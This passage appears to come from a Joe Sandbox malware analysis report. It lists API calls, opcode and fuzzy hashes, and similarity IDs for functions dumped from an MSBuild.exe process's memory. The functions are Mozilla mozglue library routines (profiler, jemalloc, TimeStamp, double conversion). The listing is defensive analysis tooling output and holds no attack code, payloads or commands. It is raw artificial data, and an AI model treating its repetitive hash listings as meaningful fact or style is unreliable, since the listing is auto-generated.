                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153571983.000000006CB3E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153615536.000000006CB42000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Currentgetenv$ExclusiveLockProcessThread$AcquireInit_thread_footerReleaseTerminate__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                                                                                                                                                                                                                            • String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
                                                                                                                                                                                                                                                                            • API String ID: 1579816589-753366533
                                                                                                                                                                                                                                                                            • Opcode ID: 090a960ba2a7b3c641fa53759b933fbf186d1b20fe0d99bb9de0e9ddf1d30184
                                                                                                                                                                                                                                                                            • Instruction ID: 1ed9e06a32ea6807e17da009c1468d3f58220e1e86f781f30650da5d13b02348
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 090a960ba2a7b3c641fa53759b933fbf186d1b20fe0d99bb9de0e9ddf1d30184
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FB11E735201614ABDB14AF28C9449ED77B9FB86369B100459FA1983F41CB71AC1ACBA0
Uniqueness

Uniqueness Score: -1.00%

APIs
• strlen.API-MS-WIN-CRT-STRING-L1-1-0(<jemalloc>,?,?,?,?,6CAECFAE,?,?,?,6CAB31A7), ref: 6CAF05FB
• _write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,<jemalloc>,00000000,6CAECFAE,?,?,?,6CAB31A7), ref: 6CAF0616
• strlen.API-MS-WIN-CRT-STRING-L1-1-0(: (malloc) Error in VirtualFree(),?,?,?,?,?,?,?,6CAB31A7), ref: 6CAF061C
• _write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,: (malloc) Error in VirtualFree(),00000000,?,?,?,?,?,?,?,?,6CAB31A7), ref: 6CAF0627
Strings
Memory Dump Source
• Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
• Associated: 00000001.00000002.2152437074.000000006CAB0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000001.00000002.2153571983.000000006CB3E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000001.00000002.2153615536.000000006CB42000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
Similarity
• API ID: _writestrlen
• String ID: : (malloc) Error in VirtualFree()$<jemalloc>
• API String ID: 2723441310-2186867486
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
• Associated: 00000001.00000002.2152437074.000000006CAB0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000001.00000002.2153571983.000000006CB3E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000001.00000002.2153615536.000000006CB42000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetCurrentThreadId.KERNEL32 ref: 6CB114C5
• ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CB114E2
• GetCurrentThreadId.KERNEL32 ref: 6CB11546
• InitializeConditionVariable.KERNEL32(?), ref: 6CB115BA
• free.MOZGLUE(?), ref: 6CB116B4
Memory Dump Source
• Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
• Associated: 00000001.00000002.2152437074.000000006CAB0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000001.00000002.2153571983.000000006CB3E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000001.00000002.2153615536.000000006CB42000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
Similarity
• API ID: CurrentThread$ConditionInitializeNow@Stamp@mozilla@@TimeV12@_Variablefree
• String ID:
• API String ID: 1909280232-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetCurrentThreadId.KERNEL32 ref: 6CB0DC60
• AcquireSRWLockExclusive.KERNEL32(?,?,?,6CB0D38A,?), ref: 6CB0DC6F
• free.MOZGLUE(?,?,?,?,?,6CB0D38A,?), ref: 6CB0DCC1
• ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,6CB0D38A,?), ref: 6CB0DCE9
• ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,6CB0D38A,?), ref: 6CB0DD05
• ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000001,?,?,?,6CB0D38A,?), ref: 6CB0DD4A
Memory Dump Source
• Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
• Associated: 00000001.00000002.2152437074.000000006CAB0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000001.00000002.2153571983.000000006CB3E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000001.00000002.2153615536.000000006CB42000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
Similarity
• API ID: ExclusiveLockStampTimeV01@@Value@mozilla@@$AcquireCurrentReleaseThreadfree
• String ID:
• API String ID: 1842996449-0
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAEFA80: GetCurrentThreadId.KERNEL32 ref: 6CAEFA8D
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAEFA80: AcquireSRWLockExclusive.KERNEL32(6CB3F448), ref: 6CAEFA99
                                                                                                                                                                                                                                                                            • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CAF6727
                                                                                                                                                                                                                                                                            • ?GetOrAddIndex@UniqueJSONStrings@baseprofiler@mozilla@@AAEIABV?$Span@$$CBD$0PPPPPPPP@@3@@Z.MOZGLUE(?,?,?,?,?,?,?,00000001), ref: 6CAF67C8
                                                                                                                                                                                                                                                                              • Part of subcall function 6CB04290: memcpy.VCRUNTIME140(?,?,6CB12003,6CB10AD9,?,6CB10AD9,00000000,?,6CB10AD9,?,00000004,?,6CB11A62,?,6CB12003,?), ref: 6CB042C4
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2152437074.000000006CAB0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153571983.000000006CB3E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153615536.000000006CB42000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ExclusiveLock$AcquireCurrentIndex@P@@3@@ReleaseSpan@$$Strings@baseprofiler@mozilla@@ThreadUniquememcpy
                                                                                                                                                                                                                                                                            • String ID: data
                                                                                                                                                                                                                                                                            • API String ID: 511789754-2918445923
                                                                                                                                                                                                                                                                            • Opcode ID: 73a0c5522650f5206bc48f6181735a9f0a830c1afe3c71876868c05f7f03bdef
                                                                                                                                                                                                                                                                            • Instruction ID: a7bea7afc162b584b13fb98eb2020d0ea6b602ed417605235481bfa333b86e0b
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 73a0c5522650f5206bc48f6181735a9f0a830c1afe3c71876868c05f7f03bdef
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0FD1C2757083808FD724DF24D851BAFBBE5AFD5308F14492DE49987B51DB30A889CB52
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • moz_xmalloc.MOZGLUE(00000001,?,?,?,?,6CABEB57,?,?,?,?,?,?,?,?,?), ref: 6CAED652
                                                                                                                                                                                                                                                                            • memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,6CABEB57,?), ref: 6CAED660
                                                                                                                                                                                                                                                                            • free.MOZGLUE(?,?,?,?,?,?,?,?,?,6CABEB57,?), ref: 6CAED673
                                                                                                                                                                                                                                                                            • free.MOZGLUE(?), ref: 6CAED888
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2152437074.000000006CAB0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153571983.000000006CB3E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153615536.000000006CB42000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free$memsetmoz_xmalloc
                                                                                                                                                                                                                                                                            • String ID: |Enabled
                                                                                                                                                                                                                                                                            • API String ID: 4142949111-2633303760
                                                                                                                                                                                                                                                                            • Opcode ID: a45f1f44e00a869de30a504c3b9468e0eddedb63244dff5c1ed9b08a8c2ab32c
                                                                                                                                                                                                                                                                            • Instruction ID: d44288bc8a7004215aa6ae1cd477491143713993f7a80f2802349f3705eb39d0
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a45f1f44e00a869de30a504c3b9468e0eddedb63244dff5c1ed9b08a8c2ab32c
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E0A1E3B0E043458FDB11CF69C4906AEBBF5AF89318F18805DD889AB741D735A889CBE1
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetFileInformationByHandle.KERNEL32(00000000,?), ref: 6CAEF480
                                                                                                                                                                                                                                                                              • Part of subcall function 6CABF100: LoadLibraryW.KERNEL32(shell32,?,6CB2D020), ref: 6CABF122
                                                                                                                                                                                                                                                                              • Part of subcall function 6CABF100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6CABF132
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 6CAEF555
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAC14B0: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(6CAC1248,6CAC1248,?), ref: 6CAC14C9
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAC14B0: memcpy.VCRUNTIME140(?,6CAC1248,00000000,?,6CAC1248,?), ref: 6CAC14EF
                                                                                                                                                                                                                                                                              • Part of subcall function 6CABEEA0: memcpy.VCRUNTIME140(?,?,?), ref: 6CABEEE3
                                                                                                                                                                                                                                                                            • CreateFileW.KERNEL32 ref: 6CAEF4FD
                                                                                                                                                                                                                                                                            • GetFileInformationByHandle.KERNEL32(00000000), ref: 6CAEF523
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2152437074.000000006CAB0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153571983.000000006CB3E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153615536.000000006CB42000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: FileHandle$Informationmemcpy$AddressCloseCreateLibraryLoadProcwcslen
                                                                                                                                                                                                                                                                            • String ID: \oleacc.dll
                                                                                                                                                                                                                                                                            • API String ID: 2595878907-3839883404
                                                                                                                                                                                                                                                                            • Opcode ID: 35d3f3ac31901cc5b837d49eb2e9da20967a9fc853be8503062118a130f76315
                                                                                                                                                                                                                                                                            • Instruction ID: 60806be445523e91233a4d3d348b9c08e8e423814dec11ca4f18208885ea3a96
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 35d3f3ac31901cc5b837d49eb2e9da20967a9fc853be8503062118a130f76315
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 734192706087509FD720DF29DD84A9AB7F4EF98318F500A1CF59593690EB34D989CBE2
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 6CB17526
                                                                                                                                                                                                                                                                            • __Init_thread_footer.LIBCMT ref: 6CB17566
                                                                                                                                                                                                                                                                            • __Init_thread_footer.LIBCMT ref: 6CB17597
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2152437074.000000006CAB0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153571983.000000006CB3E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153615536.000000006CB42000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Init_thread_footer$ErrorLast
                                                                                                                                                                                                                                                                            • String ID: UnmapViewOfFile2$kernel32.dll
                                                                                                                                                                                                                                                                            • API String ID: 3217676052-1401603581
                                                                                                                                                                                                                                                                            • Opcode ID: 4dfcad28e35b8cf3ead5d73ed1301fef02dcded9e1bf07491daba1d4b346be6d
                                                                                                                                                                                                                                                                            • Instruction ID: bccc6f980c0ad69ec7571109a3712ce9c3daa30096bad61e499b6bae084df28b
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4dfcad28e35b8cf3ead5d73ed1301fef02dcded9e1bf07491daba1d4b346be6d
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1A214935708590E7CB249FA9C918E9D3776EB56338F040569E40D67F40CB70AC068AD2
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • LoadLibraryW.KERNEL32(ntdll.dll,?,6CB1C0E9), ref: 6CB1C418
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,NtQueryVirtualMemory), ref: 6CB1C437
                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?,6CB1C0E9), ref: 6CB1C44C
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2152437074.000000006CAB0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153571983.000000006CB3E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153615536.000000006CB42000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                                            • String ID: NtQueryVirtualMemory$ntdll.dll
                                                                                                                                                                                                                                                                            • API String ID: 145871493-2623246514
                                                                                                                                                                                                                                                                            • Opcode ID: 7bbff66589d85f628602e04c167194a7a638d46b984934f868ff2450661ebf38
                                                                                                                                                                                                                                                                            • Instruction ID: b6d277eec59c8f67f418ea6ffb7c81b33c9d0353a470e1275d7ba86ab3252754
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7bbff66589d85f628602e04c167194a7a638d46b984934f868ff2450661ebf38
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 14E04F78208320EBDF247F35C908B193FF8E707206F004565AE0C83650DB74C4048B00
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • LoadLibraryW.KERNEL32(ntdll.dll,?,6CB1748B,?), ref: 6CB175B8
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 6CB175D7
                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?,6CB1748B,?), ref: 6CB175EC
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2152437074.000000006CAB0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153571983.000000006CB3E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153615536.000000006CB42000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                                            • String ID: RtlNtStatusToDosError$ntdll.dll
                                                                                                                                                                                                                                                                            • API String ID: 145871493-3641475894
                                                                                                                                                                                                                                                                            • Opcode ID: d653c5c5a1da140eca2b889aa8c0ed3773e6d708a3c8c3a15439ece37c2f7a26
                                                                                                                                                                                                                                                                            • Instruction ID: d295504e8db0e202b917aa764dad6f97103a169af583b694f7ec28cbf637c10f
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d653c5c5a1da140eca2b889aa8c0ed3773e6d708a3c8c3a15439ece37c2f7a26
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 39E0B675704761FBEF206FA6C94C7097FF8EB56218F10546AA90DD3A80EBB58441CF91
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6CAB4E5A
                                                                                                                                                                                                                                                                            • ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6CAB4E97
                                                                                                                                                                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CAB4EE9
                                                                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(?,?,00000000), ref: 6CAB4F02
                                                                                                                                                                                                                                                                            • ?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?), ref: 6CAB4F1E
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2152437074.000000006CAB0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153571983.000000006CB3E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153615536.000000006CB42000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: String$Double$Converter@double_conversion@@$Builder@2@@CreateRepresentation@$Ascii@DecimalDtoaExponentialMode@12@memcpystrlen
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 713647276-0
                                                                                                                                                                                                                                                                            • Opcode ID: 7495eac82062989c1601530d1fc17e2a5a17bd03cabc8528c7035486054b9aab
                                                                                                                                                                                                                                                                            • Instruction ID: 05bdc37c34910ba83c62afcc2b1b011afd4b152f0328d8af91d08502a736d977
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7495eac82062989c1601530d1fc17e2a5a17bd03cabc8528c7035486054b9aab
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D841BF716047019FC705CF69C48099BBBF8FF89344F148A1DF465A7641D730E998CB91
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • moz_xmalloc.MOZGLUE(-00000002,?,6CAC152B,?,?,?,?,6CAC1248,?), ref: 6CAC159C
                                                                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(00000023,?,?,?,?,6CAC152B,?,?,?,?,6CAC1248,?), ref: 6CAC15BC
                                                                                                                                                                                                                                                                            • moz_xmalloc.MOZGLUE(-00000001,?,6CAC152B,?,?,?,?,6CAC1248,?), ref: 6CAC15E7
                                                                                                                                                                                                                                                                            • free.MOZGLUE(?,?,?,?,?,?,6CAC152B,?,?,?,?,6CAC1248,?), ref: 6CAC1606
                                                                                                                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,6CAC152B,?,?,?,?,6CAC1248,?), ref: 6CAC1637
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2152437074.000000006CAB0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153571983.000000006CB3E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153615536.000000006CB42000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: moz_xmalloc$_invalid_parameter_noinfo_noreturnfreememcpy
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 733145618-0
                                                                                                                                                                                                                                                                            • Opcode ID: aa7d116747a4976bc1057636a2185b8d38e1bef7221da5a5d1e1d14321d75f5e
                                                                                                                                                                                                                                                                            • Instruction ID: 2db1cf28f78b1958fff23f85edf9ed279827c303fe94370deac90b817202caeb
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: aa7d116747a4976bc1057636a2185b8d38e1bef7221da5a5d1e1d14321d75f5e
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A731D672B001188BCB189E7CD9504BE77A9AB813647290B2DE523DBBD4EB30D9958792
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

APIs
• GetModuleHandleW.KERNEL32(00000000), ref: 6CABB532
• moz_xmalloc.MOZGLUE(?), ref: 6CABB55B
• memset.VCRUNTIME140(00000000,00000000,?), ref: 6CABB56B
• wcsncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?), ref: 6CABB57E
• free.MOZGLUE(00000000), ref: 6CABB58F
Memory Dump Source
• Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
• Associated: 00000001.00000002.2152437074.000000006CAB0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000001.00000002.2153571983.000000006CB3E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000001.00000002.2153615536.000000006CB42000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
Similarity
• API ID: HandleModulefreememsetmoz_xmallocwcsncpy_s
• String ID:
• API String ID: 4244350000-0
• Opcode ID: edfd7ede65e375824cdba62bc6ed236944323687ea18b597834b7feaabcde408
• Instruction ID: 4fa730a193c4a5a40879c4909fdd7e81ca17c45d963e9bab706b2bfcb0d35015
• Opcode Fuzzy Hash: edfd7ede65e375824cdba62bc6ed236944323687ea18b597834b7feaabcde408
• Instruction Fuzzy Hash: 82210771A002059BDB009F68DD80BAEBBBDFF41308F284229E919EB341E735D955C7A1
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 6CAECBE8: GetCurrentProcess.KERNEL32(?,6CAB31A7), ref: 6CAECBF1
  • Part of subcall function 6CAECBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6CAB31A7), ref: 6CAECBFA
• EnterCriticalSection.KERNEL32(6CB3E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6CAED1C5), ref: 6CADD4F2
• LeaveCriticalSection.KERNEL32(6CB3E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6CAED1C5), ref: 6CADD50B
  • Part of subcall function 6CABCFE0: EnterCriticalSection.KERNEL32(6CB3E784), ref: 6CABCFF6
  • Part of subcall function 6CABCFE0: LeaveCriticalSection.KERNEL32(6CB3E784), ref: 6CABD026
